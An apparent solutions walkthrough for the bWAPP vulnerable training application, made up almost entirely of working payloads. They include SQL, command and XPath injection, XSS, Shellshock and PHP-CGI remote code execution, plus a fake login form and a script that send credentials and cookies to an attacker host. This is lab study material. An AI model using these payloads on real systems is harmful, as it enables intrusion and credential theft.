In progress rough solutions. This is not a comprehensive solution list. Updating whenever I have the time.
Ref sheet http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
htmli_get.php
/bWAPP/htmli_get.php?firstname=Hello
&lastname=World
&form=submit
<h1>Hello</h1>
<h2>World</h2>
XXX: Todo, IE only?
/bWAPP/htmli_current_url.php
Following solution taken from:
http://penthusiasts.blogspot.com/2013/12/bwapp-html-injection-all.html
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Please login with valid credentials:<br><form name="login" action="http://AttackerIP/login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>
Attacker's machine:
nc -l 80
ParamUrl=robots.txt" onload="alert(1)
ParamHeight="></iframe><script>alert(1);</script>
www.nsa.gov; cat /etc/passwd
www.nsa.gov & cat /etc/passwd
www.nsa.gov | cat /etc/passwd
www.nsa.gov | sleep 10
/bWAPP/phpi.php?message=a;echo "what"; $fp = fopen("/etc/passwd","r");$result = fread($fp,8192); echo $result
<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="cat /etc/passwd" -->
a%' UNION ALL SELECT table_schema,table_name, null, null, null, null, null from information_schema.tables;--
movie=1 UNION ALL SELECT table_schema, table_name, null, null, null, null, null FROM information_schema.tables LIMIT 1 OFFSET 1;--
/bWAPP/sqli_6.php
a%' UNION ALL SELECT table_schema,table_name, null, null, null, null, null from information_schema.tables;--
Use Burp
movie=1 UNION ALL SELECT table_schema, table_name, null, null, null, null, null FROM information_schema.tables LIMIT 1 OFFSET 1;--
Use Burp
a%' UNION ALL SELECT table_schema,table_name, null, null, null, null, null from information_schema.tables;--
a%' UNION ALL SELECT 1, column_name, null, null, null, null, null from information_schema.columns where table_name="users";--
blah%' union all select 1,login,password,email,secret,1, 1 from users --
ok' or 1=1--
a%' UNION ALL SELECT 1,sqlite_version(),1,1,1,1; --
Be sure to add a space after the -- for this one, otherwise the injection will not work
asdf',(SELECT database() ))--
To begin enumerating tables:
asdf',(SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'bWAPP' LIMIT 0,1 ))--
asdf',(SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'bWAPP' LIMIT 1,1 ))--
asdf',(select password from mysql.user where user='root' ))--
password=' or id='2
genre=')]/password | a[contains(a,'
genre=') or contains(genre, '
genre=') or not(contains(genre, 'xxx') and '1'='2
Using Burp, do not allow the webpage to load captcha_box.php, this page loads the server's session variable $_SESSION["captcha"] which will then require a check on ba_captcha_bypass.php The second requirement is to prevent captcha_user from being submitted by the client. Eliminate this using Burp:
POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: bepp:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bepp:8088/bWAPP/ba_captcha_bypass.php
Cookie: PHPSESSID=67a6abb1d7ff40c55ad50d3aa43fc7c4; security_level=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
login=bee&password=bug&form=submit
Open second tab and logout. Second tab will still have session.
In URL and Cookies
admin=1
xss_get.php
<script>alert(document.cookie)</script>
xss_post.php
<script>alert(document.cookie)</script>
xss_json.php
"}]}';prompt(0)</script>
xss_ajax_2-1.php
<svg onload=prompt(0)>
xss_ajax_1-1.php
<img src='#' onerror='alert(1)'>
Alternatively I was able to get XSS to execute on the AJAX called.
xss_ajax_1-2.php?title=<html xmlns='http://www.w3.org/1999/xhtml'><script>prompt(0)</script></html>
Modify Referer header field
Referer: ';alert(1);'
Add header field
bWAPP: <script>alert(1)</script>
date=alert(1)
Referer: <script>alert(1)</script>
User-Agent: <script>alert(1)</script>
Use Burp to unhide hidden fields or intercept POST param.
Change 'login' and 'secret' field to arbitrary values.
POST /bWAPP/xxe-2.php HTTP/1.1
Host: bepp:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=UTF-8
Referer: http://bepp:8088/bWAPP/insecure_direct_object_ref_3.php
Content-Length: 59
Cookie: PHPSESSID=77aa634b546d1c78d5afc16aae328172; security_level=0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
<reset><login>bee</login><secret>Any bugs?</secret></reset>
bWAPP/insecure_direct_object_ref_2.php
Use Burp to unhide hidden ticket price field, or use proxy to modify the POST param while in transit.
It's possible because of header in response:
Access-Control-Allow-Origin: *
<html>
<head>
<script>
function steal() {
var r = new XMLHttpRequest();
r.onreadystatechange = function() {
if (r.readyState == 4 && r.status == 200) {
alert(r.responseText);
}
};
r.open("GET", "http://192.168.1.10/bWAPP/secret-cors-1.php", true);
r.send();
}
</script>
</head>
<body onload="steal()">
</body>
</html>
Doesn't work on modern browsers as there are security enforcements. Maybe use phantomJS?
I modified the POC to use GET instead of TRACE. Additional changes from original xst.js include making the onreadystatechange NOT inline (seems to play better with FF).
-
Start listener on attacking machine: nc -l 8888
-
Modify xst.js to match your environment:
var xmlhttp;
// Code for IE7 , Firefox, Chrome, Opera, Safari
if (window.XMLHttpRequest)
{
xmlhttp=new XMLHttpRequest();
}
// Code for IE6, IE5
else
{
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange=foo;
function foo()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{
xmlResp=xmlhttp.responseText;
// document.getElementById("response").innerHTML=xmlResp
alert(xmlResp);
document.location="http://[attacker_ip]:8888/grab.cgi?" document.cookie;
}
}
// xmlhttp.open("TRACE","/bWAPP/",true);
xmlhttp.open("GET","/bWAPP/",true);
// xmlhttp.withCredentials = true;
xmlhttp.send();
Anonymous login with write permissions are enabled
$ ftp 192.168.1.9
Connected to 192.168.1.9.
anonymous
220 ProFTPD 1.3.1 Server (bee-box) [192.168.1.9]
Name (192.168.1.9:dean): 331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||42936|)
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 root www-data 543803 Nov 2 2014 Iron_Man.pdf
-rw-rw-r-- 1 root www-data 462949 Nov 2 2014 Terminator_Salvation.pdf
-rw-rw-r-- 1 root www-data 544600 Nov 2 2014 The_Amazing_Spider-Man.pdf
-rw-rw-r-- 1 root www-data 526187 Nov 2 2014 The_Cabin_in_the_Woods.pdf
-rw-rw-r-- 1 root www-data 756522 Nov 2 2014 The_Dark_Knight_Rises.pdf
-rw-rw-r-- 1 root www-data 618117 Nov 2 2014 The_Incredible_Hulk.pdf
-rw-rw-r-- 1 root www-data 5010042 Nov 2 2014 bWAPP_intro.pdf
226 Transfer complete
ftp> puts test.txt
?Invalid command.
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||28299|)
150 Opening BINARY mode data connection for test.txt
0 0.00 KiB/s
226 Transfer complete
ftp> ^D
221 Goodbye.
Default community strings are set on the machine
$ snmpwalk -v2c -c private bwapp-server
$ snmpwalk -v2c -c public bwapp-server
curl -X PUT --data '<?php $f=fopen("/etc/passwd","r"); echo fread($f,filesize("/etc/passwd")); fclose($f); ?>' 'http://192.168.1.10/webdav/attack.php'
Use Burp to get cookie
Use the heartbleed.py script found in the /evil directory
python heartbleed.py [ip]
directory_traversal_2.php
/bWAPP/directory_traversal_2.php?directory=../../../../home/
directory_traversal_1.php
/bWAPP/directory_traversal_1.php?page=../../../../../etc/passwd
hostheader_1.php
hostheader_2.php
Copy rfi.txt to rfi.php, it appears PHP automatically adds the suffix .php.
bWAPP/rlfi.php?language=../evil/rfi
Modify request
User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Mobile Safari/535.19
Reference the HTML files in resources directory. You can modify these to auto execute in a hidden iframe as an exercise. If bWAPP had CSRF mitigations (such as utilization of tokens), then the POST requests made from the csrf_x.html files would respond with forbidden.
Please reference csrf_1.html. Replace the address within the HTML with your own bWAPP server and run the form to change the password. If CSRF tokens were utilized, then the server should return forbidden.
Please references csrf_2.html. Again, replace the address within the HTML with your own bWAPP server to change the secret.
Please references csrf_3.html. Again, replace the address within the HTML with your own bWAPP server to change the secret.
POST /bWAPP/admin/phpinfo.php?-d allow_url_include=1 -d auto_prepend_file=php://input HTTP/1.1
Host: 192.168.1.20
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 70
Cookie: security_level=0; PHPSESSID=e27e4148fbb0b82028e1cd6e159f4e7a
Connection: close
<?php $r; exec('cat /etc/passwd', $r); echo implode($r, "\n"); die; ?>
There is also possibility to display source code
http://192.168.1.20/bWAPP/admin/phpinfo.php?-s
Modify /bWAPP/cgi-bin/shellshock.sh request
Referer: () { nothing;}; /bin/touch /tmp/malicious
Referer: () { nothing;}; echo; /bin/cat /etc/passwd
Put name
bee&movie=1
then every link will choose G.I Joe: Retaliation movie.
http://192.168.1.20/bWAPP/http_response_splitting.php?url=http://itsecgames.blogspot.com
Referer:google.com
